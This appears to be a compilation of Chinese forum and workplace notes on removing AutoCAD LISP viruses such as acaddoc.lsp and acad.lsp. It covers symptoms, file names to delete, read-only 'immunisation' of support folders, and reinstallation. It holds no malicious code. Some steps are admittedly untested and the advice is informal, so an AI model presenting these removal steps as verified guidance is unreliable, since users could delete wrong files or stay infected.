打开CAD，命令栏英文闪烁，错误: 参数类型错误: streamp nil，按ESC键可终止这个病毒的清除，如下：1.全盘扫描所有的*.mnl 和*.lsp2.清除每一个文件中“(setq flagx t)” 行以下的所有内容；3.清除后如果文件为空，则删除之。

整理后如下经验供大家分享（亲测）：1，为了铲除病根，建议首先按文献的说明扫描全盘（只要中了这个毒你打开过的cad文件全都会携带，而且是隐藏的格式）*。

lsp文件，全部删除，（现在很多同事电脑里同时都放了安装包，看清了，别把安装包里面的给删了）2，彻底卸载cad(建议用360可以清除注册表以及加载项)3，重装cad（有人看到这里觉得说到这里就很无语了，也许会想，既然重装还费个什么话还删除lsp.那就错了，重装是因为要彻底清除的基础上打防御针。

而且以后都不会中这个毒了。

如果不重装只用修复，病毒还是会找到你的，而且重装和修复时间是相差无几的）4。

（重点）重装后切忌不可启动cad.再次搜索*.lsp(安装目录下的)然后全选中把属性改成只读这下就没有问题了，哪怕是再次打开别人发过来的中毒文件也不会有问题了，测试后结果04.10都适用。

acaddoc.lsp是一个木马！1、查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除；2、查找acadapq.lsp删除；3、查找c:\boot.dat删除；（注意是boot.dat，不是boot.ini）4、打开acad.mnl，将加载acadapq.lsp的句子删除；5、为防止再被感染，建议将acad.mnl设成只读，建个空的acaddoc.lsp设为只读，应该就可以防止感染了；6、注意局域网要统一时间杀毒，否则杀不干净；============查看文件名后缀，请按以下步骤进行设置:双击打开“我的电脑”，在菜单栏上依次点击“工具”“文件夹选项”“查看”，把“隐藏已知文件类型的扩展名”前的勾去掉，确定。

手工删除CAD病毒文件的方法
1.先关掉CAD，然后打开下面路径下的搜索软件（可以ctrl+单击）
\\192.168.10.253\projects\0000文件中转站\SF\Everything文件搜索工具\Everything_x64.exe
2.点“书签”
3.里面有我做好的记录，分别选择搜索”acad.fas” “acaddoc.lsp“”acaddoc.lsp_bak“三个文件，
然后选中，按“delete”键删除。

注：文件夹除外，文件夹是用来免疫的，防止病毒再复制到该文件夹下的，利用的原理就是不能有两个相同文件名的文件同时存在于同一个文件夹下。

4.务必每个人的电脑都做如上操作一次。

如果有文件删不掉或不清楚操作，联系我。

5.操作完之后，右下角有个图标，点右键，退出.
江增源
2015.12.08
2015.12.17更新
1.最近又发现了一个新的病毒文件，文件名为“acad.lsp”，删除方法同上，搜到的文件只要是文件名名字完全匹配的，都删除掉就可以。

2.这个病毒的发作特征就是打开CAD会弹出一个空白的窗口出来。

江增源
2015.12.17。

acaddoc.lsp病毒解决方案（本人经试验成功解决）现在好多朋友从别的机器拷贝图纸会带过来一种acaddoc.lsp病毒，具体症状为：1.每次打开DWG图纸，在图纸文件夹中会产生acaddoc.lsp文件，文件大小约为3528KB；2.每次打开AUTOCAD，无论任何图纸，在命令行前几行中都会出现配置表有缺陷，经常会出现三个，且无论打开什么图纸，软件打开速度特别慢，一般会在两分钟以上。

解决方法请按如下步骤（详述，如果电脑知识过关可直接做到每项小标题内容即可）：1.删除当前电脑中所有acaddoc.lsp文件打开‘我的电脑’→‘搜索’→搜索内容‘acaddoc.lsp’,最好打开高级选项中的搜索隐藏文件等小选项→全选搜索完成界面的该文件，删除→退出搜索即可；2.卸载当前AUTOCAD软件（并手工删除‘C:\Documents and Settings\Ad ministrator\Application Data\Autodesk’路径中的所有文件夹）使用3 60安全卫士等第三方软件卸载当前已经安装的AUTOCAD软件，因为我用系统自带卸载程序总是无法卸载被病毒感染的几个文件造成卸载失败，我们卸载软件的目的是彻底删除染毒文件，因为我们大部分人不会一个一个去找到这些文件并修复，不如重装一次节省时间；3.重装AUTOCAD软件（最好从压缩包中重新释放安装软件）该处没有特别的地方，大家按安装程序中的说明重装即可，唯一需要注意的就是安装程序一定要保证是无毒的，所以我才会特别注明要从压缩包中重新释放一次安装软件；4.预防再次染毒（此步骤我没有进行实践验证，只是参考当前网上的一些说明，为了保险，我对网上的说明进行了扩大范围处理）项目1：C:\Documents and Settings\Administrator\Application D ata\Autodesk\AutoCAD 2007\R17.0\chs目录下的SUPPORT文件夹（包括子文件夹）设置为只读；项目2：*:\******\AutoCAD 2007目录下的SUPPORT文件夹（包括子文件夹）设置为只读，‘*’为AUTOCAD主文件安装路径；重装了三次才找到这四个步骤，尽量按上面特别注明的要求来，因为第二次重装时曾遇到“正在重生成模型。